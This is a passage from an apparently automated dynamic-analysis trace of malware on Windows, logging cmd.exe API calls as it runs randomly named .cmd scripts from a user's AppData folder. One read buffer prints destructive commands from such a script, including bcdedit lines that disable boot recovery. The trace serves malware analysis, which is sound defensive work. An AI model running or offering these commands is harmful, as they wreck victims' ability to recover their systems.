lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0210.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.612] GetFileType (hFile=0x7) returned 0x2 [0210.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0210.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.613] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x480ff8*, nNumberOfCharsToWrite=0x4, 
lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x480ff8*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0210.613] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" CiOHhXJTCFVtKQz1Zuv ") returned 21 [0210.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.613] GetFileType (hFile=0x7) returned 0x2 [0210.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0210.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.613] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x15) returned 1 [0210.613] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0210.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.613] GetFileType (hFile=0x7) returned 0x2 [0210.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0210.614] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.614] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0210.614] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0210.614] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0210.614] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0210.614] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0210.614] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0210.614] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0210.614] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0210.614] _wcsicmp 
(_String1="echo", _String2="RENAME") returned -13 [0210.614] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0210.614] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0210.614] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.614] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x28f254 | out: _Buffer="CiOHhXJTCFVtKQz1Zuv\r\n") returned 21 [0210.614] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.614] GetFileType (hFile=0x7) returned 0x2 [0210.614] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.614] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f214 | out: lpMode=0x28f214) returned 1 [0210.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.615] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f240, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f240*=0x15) returned 1 [0210.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.615] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.615] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.615] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.615] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.615] SetConsoleInputExeNameW () returned 0x1 [0210.615] GetConsoleOutputCP () returned 0x1b5 [0210.616] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.616] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0210.616] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0210.616] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.616] SetFilePointer (in: hFile=0x58, lDistanceToMove=570, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23a [0210.616] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.616] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23a [0210.616] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x2, lpOverlapped=0x0) returned 1 [0210.616] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=2, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="\r\nho CiOHhXJTCFVtKQz1Zuv\r\ns /all /quiet\r\nll /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 2 [0210.616] _tell (_FileHandle=3) returned 572 [0210.616] _close (_FileHandle=3) returned 0 [0210.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0210.616] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0210.616] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] SetFilePointer (in: hFile=0x58, lDistanceToMove=572, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23c [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] SetFilePointer (in: 
hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23c [0210.617] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x0, lpOverlapped=0x0) returned 1 [0210.617] GetLastError () returned 0x0 [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] GetFileType (hFile=0x58) returned 0x1 [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x23c [0210.617] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f68c, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f68c*=0x0, lpOverlapped=0x0) returned 1 [0210.617] GetLastError () returned 0x0 [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] GetFileType (hFile=0x58) returned 0x1 [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x23c [0210.617] longjmp () [0210.617] _tell (_FileHandle=3) returned 572 [0210.617] _close (_FileHandle=3) returned 0 [0210.617] CmdBatNotification () returned 0x0 [0210.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.617] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.618] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.618] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.618] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.618] SetConsoleInputExeNameW () returned 0x1 [0210.618] GetConsoleOutputCP () returned 0x1b5 [0210.618] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.618] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.618] exit (_Code=0) Process: id = "60" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xe9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0xdf4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8629 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8630 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8631 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8632 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8633 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8634 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" 
(normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8635 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8636 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8637 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 8638 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8875 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8876 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8877 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8878 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8879 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 8880 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8881 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 8882 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8883 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8884 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8885 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8886 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8887 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8888 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8889 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 8890 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8891 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 
0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8892 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8893 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8894 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 8895 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8896 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 8897 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 8898 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 8926 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8927 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8928 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8929 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private 
name = "private_0x00000000002e0000" filename = "" Region: id = 8930 start_va = 0x12b0000 end_va = 0x157efff entry_point = 0x12b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 100 os_tid = 0xea0 [0117.827] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfc0c | out: lpSystemTimeAsFileTime=0x1cfc0c*(dwLowDateTime=0x83799120, dwHighDateTime=0x1d440a9)) [0117.827] GetCurrentProcessId () returned 0xe9c [0117.827] GetCurrentThreadId () returned 0xea0 [0117.827] GetTickCount () returned 0x27edf [0117.827] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfc04 | out: lpPerformanceCount=0x1cfc04*=17461665412) returned 1 [0117.828] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0117.828] __set_app_type (_Type=0x1) [0117.828] __p__fmode () returned 0x76b331f4 [0117.828] __p__commode () returned 0x76b331fc [0117.828] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0117.828] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0117.829] GetCurrentThreadId () returned 0xea0 [0117.829] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xea0) returned 0x38 [0117.829] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.829] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0117.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.829] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfb9c | out: phkResult=0x1cfb9c*=0x0) returned 0x2 [0117.829] 
VirtualQuery (in: lpAddress=0x1cfbd3, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.829] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.829] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.829] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.829] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0117.829] GetConsoleOutputCP () returned 0x1b5 [0117.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.829] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0117.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.829] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0117.830] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.830] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.830] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.830] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.830] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.830] GetConsoleMode (in: hConsoleHandle=0x3, 
lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.830] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.830] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0117.830] GetEnvironmentStringsW () returned 0x340150* [0117.831] FreeEnvironmentStringsW (penv=0x340150) returned 1 [0117.831] GetEnvironmentStringsW () returned 0x340150* [0117.831] FreeEnvironmentStringsW (penv=0x340150) returned 1 [0117.831] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceb0c | out: phkResult=0x1ceb0c*=0x40) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x0, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x1, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x1, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x0, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x40, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: 
lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x40, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x40, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegCloseKey (hKey=0x40) returned 0x0 [0117.831] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceb0c | out: phkResult=0x1ceb0c*=0x40) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x40, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x1, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x1, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x0, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x9, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x9, lpcbData=0x1ceb10*=0x4) 
returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x9, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegCloseKey (hKey=0x40) returned 0x0 [0117.831] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635e [0117.832] srand (_Seed=0x5b88635e) [0117.832] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"" [0117.832] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"" [0117.832] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.832] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3419b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0117.832] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.832] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.832] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 